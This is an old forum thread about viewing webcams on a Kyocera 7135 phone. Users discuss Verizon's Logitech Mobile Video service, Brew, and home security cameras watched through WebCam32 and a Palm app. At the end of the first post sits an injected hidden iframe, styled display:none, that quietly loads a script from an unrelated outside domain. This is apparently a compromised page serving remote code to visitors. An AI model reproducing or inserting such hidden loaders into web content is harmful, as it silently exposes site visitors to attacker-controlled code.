+ Reply to Thread

Web Cams on the 7135?

The following is an excerpt from today's New York Times:

"A consortium composed of Logitech, Verizon Wireless, Qualcomm and gPix has just stumbled onto a novel idea. Maybe the "killer app" for video on phones isn't seeing the person you're calling. Instead, the exciting development may be the ability to use your cellphone's color screen to view remote scenes, both of public places and of your own private ones. What was once a piece of communications gear thus becomes a tool for security, safety and even spying. A new service called Logitech Mobile Video costs $5 per month and is available to Verizon Wireless customers with so-called Get It Now phones: the Audiovox CDMA2000, the Sharp Z-800 or the Motorola T-720. These phones can run miniature programs written in something called Brew, a software tool kit for cellphones from Qualcomm."

The article goes on to state that if you have this Mobile Video app downloaded onto your phone, you can tap into any web cam that makes itself available, including one that you might set up yourself. Now, I know that the 7135 isn't listed here, but we all know of the links between Kyocera and Qualcomm, so maybe this app could run on a 7135 too. that would be nice<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

That would indeed be very cool!

Except that the 7135 doesn't use Brew technology.

Any workarounds?
    ~'kito
    pdaPhoneHome Moderator

I think that a Palm app could be developed to replace the Brew technology. I'm thinking it would be just some kind of IP connection. And then of couse, to subscribe to the actual service through Verizon. I think once Verizon sees just how well the 7135 will sell would be enough incentive for them to have something developed for the Palm side, and even on the PPC side for their Thera and upcoming i700.

Guys..... You have web browsers on the phone. You can view web cams already. I have been using my 7135 to view my security camera for over a month now.

Alan

In fact... I'm watching you right now Alan! (just kidding!)
    be careful out there.
    <bugle>

Originally posted by aka.bugle
    In fact... I'm watching you right now Alan! (just kidding!)
    be careful out there.
    <bugle>
    Heh! I don't leave the camera on all the time. Too creepy. I have a motion sensor that turns it on only if hte security system is armed. I am now working on having it email me a bunch of snapshots when it first activates too.

Alan

This already works

I have a setup like this working on my 7135 already. I have a PC at home running WebCam32, and capturing live video from a video camera. I have the Palm OS version of WebCam running on my 7135. I can connect and view my home video camera this way. The Palm OS app also comes with some pointers to other video sites, but most don't seem to work. It's a good way to test to see if the 7135 side is working, however.
    You can find this at www.surveyor.com
    MikeA

Mike, it seems to be down at the moment. When did you last check in there?
    ~'kito
    pdaPhoneHome Moderator

Damn, I think half the internet is broken right now. I can't get to a ton of sites.

Damn that Bin Laden!
    ~'kito
    pdaPhoneHome Moderator